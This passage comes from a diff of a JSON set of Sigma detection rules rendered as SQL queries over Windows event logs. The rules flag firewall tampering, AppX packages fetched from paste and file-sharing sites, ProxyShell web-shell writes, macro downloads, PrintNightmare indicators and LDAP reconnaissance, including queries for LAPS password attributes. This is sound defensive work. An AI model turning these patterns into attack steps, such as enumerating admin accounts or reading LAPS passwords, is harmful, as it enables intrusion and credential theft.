'%AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\'))))" - ], - "filename": "win_firewall_as_add_rule_susp_folder.yml" - }, - { - "title": "The Windows Defender Firewall Service Failed To Load Group Policy", - "id": "7ec15688-fd24-4177-ba43-1a950537ee39", - "status": "experimental", - "description": "Detects activity when The Windows Defender Firewall service failed to load Group Policy", - "author": "frack113", - "level": "low", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced 
Security/Firewall' AND EventID = '2009')" - ], - "filename": "win_firewall_as_failed_load_gpo.yml" - }, - { - "title": "Firewall Rule Modified In The Windows Firewall Exception List", - "id": "5570c4d9-8fdd-4622-965b-403a5a101aa0", - "status": "experimental", - "description": "Detects when a rule has been modified in the windows firewall exception list", - "author": "frack113", - "level": "low", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2005' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" - ], - "filename": "win_firewall_as_change_rule.yml" - }, - { - "title": "Windows Defender Firewall Has Been Reset To Its Default Configuration", - "id": "04b60639-39c0-412a-9fbe-e82499c881a3", - "status": "experimental", - "description": "Detects activity when Windows Defender Firewall has been reset to its default configuration", - "author": "frack113", - "level": "low", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2032')" + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." 
], - "filename": "win_firewall_as_reset_config.yml" - }, - { - "title": "A Rule Has Been Deleted From The Windows Firewall Exception List", - "id": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", - "status": "experimental", - "description": "Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall", - "author": "frack113", "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2006' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\') OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" - ], - "filename": "win_firewall_as_delete_rule.yml" - }, - { - "title": "Windows Firewall Settings Have Been Changed", - "id": "00bb5bd5-1379-4fcf-a965-a5b6f7478064", - "status": "experimental", - "description": "Detects activity when the settings of the Windows firewall have been changed", - "author": "frack113", - "level": "low", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID IN ('2002', '2003', '2008'))" - ], - "filename": "win_firewall_as_setting_change.yml" - }, - { - "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", - "id": "79609c82-a488-426e-abcf-9f341a39365d", - "status": "experimental", - "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", - "author": "frack113, Nasreddine Bencherchali", - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2033' AND NOT 
(((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\') OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\_\\_PSScriptPolicyTest\\_%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "win_firewall_as_delete_all_rules.yml" + "filename": "file_event_win_powershell_drop_binary.yml" }, { - "title": "Suspicious Remote AppX Package Locations", - "id": "8b48ad89-10d8-4382-a546-50588c410f0d", - "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious MSExchangeMailboxReplication ASPX Write", + "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", + "status": "test", + "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", + "author": "Florian 
Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.initial_access", + "attack.t1190", + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_susp_domains.yml" + "filename": "file_event_win_susp_exchange_aspx_write.yml" }, { - "title": "Deployment Of The AppX Package Was Blocked By The Policy", - "id": "e021bbb5-407f-41f5-9dc9-1864c45a7a51", + "title": "Office Macro File Download", + "id": "0e29e3a7-1ad8-40aa-b691-9f82ecd33d66", "status": "experimental", - "description": "Detects an appx package deployment that was blocked by the local computer policy", - "author": "frack113", + "description": "Detects the creation of a new office macro 
files on the systems via an application (browser, mail client).", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unknown" + "Legitimate macro files downloaded from the internet", + "Legitimate macro files sent as attachments via emails" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('441', '442', '453', '454'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\') AND ((TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\') OR (TargetFilename LIKE '%.docm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dotm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xltm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.potm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.pptm:Zone%' 
ESCAPE '\\')))" ], - "filename": "win_appxdeployment_server_policy_block.yml" + "filename": "file_event_win_office_macro_files_downloaded.yml" }, { - "title": "Suspicious AppX Package Installation Attempt", - "id": "898d5fc9-fbc3-43de-93ad-38e97237c344", + "title": "Publisher Attachment File Dropped In Suspicious Location", + "id": "3d2a2d59-929c-4b78-8c1a-145dfe9e07b1", "status": "experimental", - "description": "Detects an appx package installation with the error code \"0x80073cff\" which indicates that the package didn't meet the signing requirements and could be suspicious", + "description": "Detects creation of files with the \".pub\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion" ], "falsepositives": [ - "Legitimate AppX packages not signed by MS used part of an enterprise" + "Legitimate usage of \".pub\" files from those locations" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '401' AND ErrorCode = '0x80073cff')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.pub' ESCAPE '\\')" ], - "filename": "win_appxdeployment_server_susp_appx_package_installation.yml" + "filename": "file_event_win_office_publisher_files_in_susp_locations.yml" }, { - "title": "Deployment AppX Package Was Blocked By AppLocker", - "id": "6ae53108-c3a0-4bee-8f45-c7591a2c337f", + "title": "Suspicious Screensaver Binary File Creation", + "id": "97aa2e88-555c-450d-85a6-229bcd87efb8", "status": "experimental", - "description": "Detects an appx package deployment that was blocked by AppLocker 
policy", + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1546.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '412')" - ], - "filename": "win_appxdeployment_server_applocker_block.yml" - }, - { - "title": "Potential Malicious AppX Package Installation Attempts", - "id": "09d3b48b-be17-47f5-bf4e-94e7e75d09ce", - "status": "experimental", - "description": "Detects potential installation or installation attempts of known malicious appx packages", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Rare occasions where a malicious package uses the exact same name and version as a legtimate application" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('400', '401') AND PackageFullName LIKE '%3669e262-ec02-4e9d-bcb4-3d008b4afac9%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\Kindle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Bin\\\\ccSvcHst.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\uwfservicingscr.scr' ESCAPE '\\')))" ], - "filename": "win_appxdeployment_server_mal_appx_names.yml" + "filename": "file_event_win_creation_scr_binary_file.yml" }, { - "title": "Suspicious AppX Package Locations", - "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", + "title": "Legitimate Application Dropped Archive", + "id": 
"654fcc6d-840d-4844-9b07-2c3300e54a26", "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects programs on a Windows system that should not write an archive to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" - ], - "filename": "win_appxdeployment_server_susp_package_locations.yml" - }, - { - "title": "Uncommon AppX Package Locations", - "id": "c977cb50-3dff-4a9f-b873-9290f56132f1", - "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in uncommon locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND NOT (((Path LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' 
OR Path LIKE '%C:\\\\Windows\\\\SystemApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\PrintDialog\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\ImmersiveControlPanel\\\\%' ESCAPE '\\' OR Path LIKE '%x-windowsupdate://%' ESCAPE '\\' OR Path LIKE '%file:///C:/Program\\%20Files%' ESCAPE '\\')) OR ((Path LIKE '%https://statics.teams.cdn.office.net/%' ESCAPE '\\' OR Path LIKE '%microsoft.com%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_uncommon_package_locations.yml" + "filename": "file_event_win_legitimate_app_dropping_archive.yml" }, { - "title": "WMI Persistence", - "id": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", + "title": "Pingback 
Backdoor File Indicators", + "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", "status": "test", - "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", - "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.003" - ], - "falsepositives": [ - "Unknown (data set is too small; further testing needed)" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (((EventID = '5861' AND (logs MATCH ('\"ActiveScriptEventConsumer\" OR \"CommandLineEventConsumer\" OR \"CommandLineTemplate\"'))) OR EventID = '5859') AND NOT (Provider = 'SCM Event Provider' AND Query LIKE 'select % from MSFT\\_SCMEventLogEvent' ESCAPE '\\' AND User = 'S-1-5-32-544' AND PossibleCause = 'Permanent'))" - ], - "filename": "win_wmi_persistence.yml" - }, - { - "title": "Sysinternals Tools AppX Versions Execution", - "id": "d29a20b2-be4b-4827-81f2-3d8a59eab5fc", - "status": "experimental", - "description": "Detects execution of Sysinternals tools via an AppX package. 
Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.execution" - ], - "falsepositives": [ - "Legitimate usage of the applications from the Windows Store" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppModel-Runtime/Admin' AND EventID = '201' AND ImageName IN ('procdump.exe', 'psloglist.exe', 'psexec.exe', 'livekd.exe', 'ADExplorer.exe'))" - ], - "filename": "win_appmodel_runtime_sysinternals_tools_appx_execution.yml" - }, - { - "title": "CVE-2021-1675 Print Spooler Exploitation", - "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", - "status": "test", - "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675" - ], - "falsepositives": [ - "Unknown" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" - ], - "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" - }, - { - "title": "Potential Active Directory Reconnaissance/Enumeration Via LDAP", - "id": "31d68132-4038-47c7-8f8e-635a39a7c174", - "status": "test", - "description": "Detects potential Active Directory enumeration via LDAP", - "author": "Adeem Mawani", - "tags": [ - "attack.discovery", - "attack.t1069.002", - "attack.t1087.002", - "attack.t1482" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (((EventID = '30' AND (SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483648)%' ESCAPE '\\' OR SearchFilter LIKE 
'%(groupType:1.2.840.113556.1.4.803:=2147483656)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483652)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483650)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306369)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306368)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870913)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870912)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435457)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435456)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=groupPolicyContainer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=organizationalUnit)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=Computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=nTDSDSA)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=domain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=person)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=trustedDomain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=521)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=516)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=515)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=512)%' ESCAPE '\\' OR SearchFilter LIKE '%Domain Admins%' ESCAPE '\\' OR SearchFilter LIKE '%objectGUID=\\*' ESCAPE '\\' OR SearchFilter LIKE '%(schemaIDGUID=\\*)%' ESCAPE '\\')) AND NOT (EventID = '30' AND (SearchFilter LIKE '%(domainSid=%)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectSid=%)%' 
ESCAPE '\\'))) OR (EventID = '30' AND (SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=4194304)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=2097152)%' ESCAPE '\\' OR SearchFilter LIKE '%!(userAccountControl:1.2.840.113556.1.4.803:=1048574)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=524288)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=65536)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=8192)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=544)%' ESCAPE '\\' OR SearchFilter LIKE '%!(UserAccountControl:1.2.840.113556.1.4.803:=2)%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToActOnBehalfOfOtherIdentity%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToDelegateTo%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-GroupManagedServiceAccount%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=9223372036854775807)%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=0)%' ESCAPE '\\' OR SearchFilter LIKE '%(adminCount=1)%' ESCAPE '\\' OR SearchFilter LIKE '%ms-MCS-AdmPwd%' ESCAPE '\\')))" - ], - "filename": "win_ldap_recon.yml" - }, - { - "title": "Block Load Of Revoked Driver", - "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", - "description": "Detects blocked load attempts of revoked drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "status": "experimental", - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" - ], - "filename": "win_codeintegrity_revoked_driver.yml" - }, - { - "title": "Code Integrity Attempted DLL Load", - "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", - "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level 
requirements. It often means the file's signature is revoked or expired", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", - "status": "experimental", - "tags": [ - "attack.execution" + "attack.t1574.001" ], "falsepositives": [ - "Antivirus products" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR 
